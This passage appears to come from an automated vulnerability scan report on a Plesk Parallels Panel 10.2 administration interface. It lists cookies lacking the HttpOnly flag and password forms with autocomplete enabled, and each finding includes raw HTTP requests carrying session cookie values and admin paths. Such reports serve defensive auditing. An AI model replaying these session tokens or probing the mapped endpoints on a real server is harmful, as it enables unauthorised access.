P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=interface-pref; path=/
Date: Sat, 24 Sep 2011 14:16:08 GMT
Server: sw-cp-server
Content-Length: 7293

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="23c
...[SNIP]...

5.57. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/report/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/report/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: reseller_report__report_id=2; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:30:16 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: reseller_report__report_id=2
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:30:16 GMT
Server: sw-cp-server
Content-Length: 15748

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

5.58. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/report/layout@2/auto@/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/report/layout@2/auto@/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/
Cookie: reseller_report__report_id=2; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:30:21 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:30:21 GMT
Server: sw-cp-server
Content-Length: 9967

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

5.59. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@1/properties/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/report/layout@2/auto@1/properties/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/report/layout@2/auto@1/properties/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@/
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 15:30:34 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:30:35 GMT
Server: sw-cp-server
Content-Length: 8161

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

5.60. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@2/properties/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/report/layout@2/auto@2/properties/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/report/layout@2/auto@2/properties/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@/
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 15:30:34 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:30:34 GMT
Server: sw-cp-server
Content-Length: 8192

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

5.61. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@new/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/report/layout@2/auto@new/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/report/layout@2/auto@new/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Sat, 24 Sep 2011 15:30:25 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:30:25 GMT
Server: sw-cp-server
Content-Length: 9935

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

5.62. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@new/properties/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/report/layout@2/auto@new/properties/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/reseller@3/report/layout@2/auto@new/properties/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@/
Cookie: reseller_report__report_id=2; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:30:25 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:30:25 GMT
Server: sw-cp-server
Content-Length: 8336

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="b72
...[SNIP]...

6. Password field with autocomplete enabled  previous  next
There are 6 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


6.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/login-info/id/4  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer/login-info/id/4

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /admin/customer/login-info/id/4 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/overview/id/4
Cookie: locale=en-US; PHPSESSID=d2d161e01ff538a0e1392cab512865cd; psaContext=customers; BarExpanded=True

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 16:03:01 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 16:03:01 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=customers; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 16:03:01 GMT
Server: sw-cp-server
Content-Length: 10366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...
<div id="main">
<form id="form-form-final-logininfo" enctype="application/x-www-form-urlencoded" action="" method="post">
<tr>
...[SNIP]...
<div class='field-value'>

<input type="password" name="loginInfo[password]" id="loginInfo-password" value="" class="input-text" />
<span class='field-errors' style="display:none;">
...[SNIP]...
<div class='field-value'>

<input type="password" name="loginInfo[passwordConfirmation]" id="loginInfo-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;">
...[SNIP]...

6.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/login-info/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/login-info/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /admin/reseller/login-info/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=dashboard; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:13:35 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:13:36 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=credentials-info; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:13:36 GMT
Server: sw-cp-server
Content-Length: 9896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...
<div id="main">
<form id="form-form-final-logininfo" enctype="application/x-www-form-urlencoded" action="" method="post">
<tr>
...[SNIP]...
<div class='field-value'>

<input type="password" name="loginInfo[password]" id="loginInfo-password" value="" class="input-text" />
<span class='field-errors' style="display:none;">
...[SNIP]...
<div class='field-value'>

<input type="password" name="loginInfo[passwordConfirmation]" id="loginInfo-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;">
...[SNIP]...

6.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/login-info/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/login-info/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /admin/reseller/login-info/?context=credentials-info HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=dashboard; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:13:35 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:13:36 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=credentials-info; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 14:13:36 GMT
Server: sw-cp-server
Content-Length: 9949

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...
<div id="main">
<form id="form-form-final-logininfo" enctype="application/x-www-form-urlencoded" action="" method="post">
<tr>
...[SNIP]...
<div class='field-value'>

<input type="password" name="loginInfo[password]" id="loginInfo-password" value="" class="input-text" />
<span class='field-errors' style="display:none;">
...[SNIP]...
<div class='field-value'>

<input type="password" name="loginInfo[passwordConfirmation]" id="loginInfo-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;">
...[SNIP]...

6.4. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-password/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/admin-password/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /plesk/admin-password/?context=credentials-info HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BarExpanded=True; PHPSESSID=1e33734a9713ad69de63c483f7f5d471; locale=en-US; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 23 Sep 2011 19:42:30 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=credentials-info; path=/
Date: Fri, 23 Sep 2011 19:42:30 GMT
Server: sw-cp-server
Content-Length: 9194

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   
   <head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
<meta content="6cf
...[SNIP]...
<div class="screenBody" id="">
       
       
       <form action="/plesk/admin-password/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
...[SNIP]...
<td><INPUT size="15" maxlength="255" name="old_passwd" id="fid-old_passwd" type="password" value=""></td>
...[SNIP]...
<td><INPUT size="15" maxlength="255" name="new_passwd" id="fid-new_passwd" type="password" value=""></td>
...[SNIP]...
<td><INPUT size="15" maxlength="255" name="new_passwd1" id="fid-new_passwd1" type="password" value="">
           <div class="hint">
...[SNIP]...

6.5. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/ftp-repository/properties/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /plesk/reseller@3/backup/ftp-repository/properties/

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /plesk/reseller@3/backup/ftp-repository/properties/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 24 Sep 2011 15:31:13 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: psaContext=tools; path=/
Date: Sat, 24 Sep 2011 15:31:13 GMT
Server: sw-cp-server
Content-Length: 8796

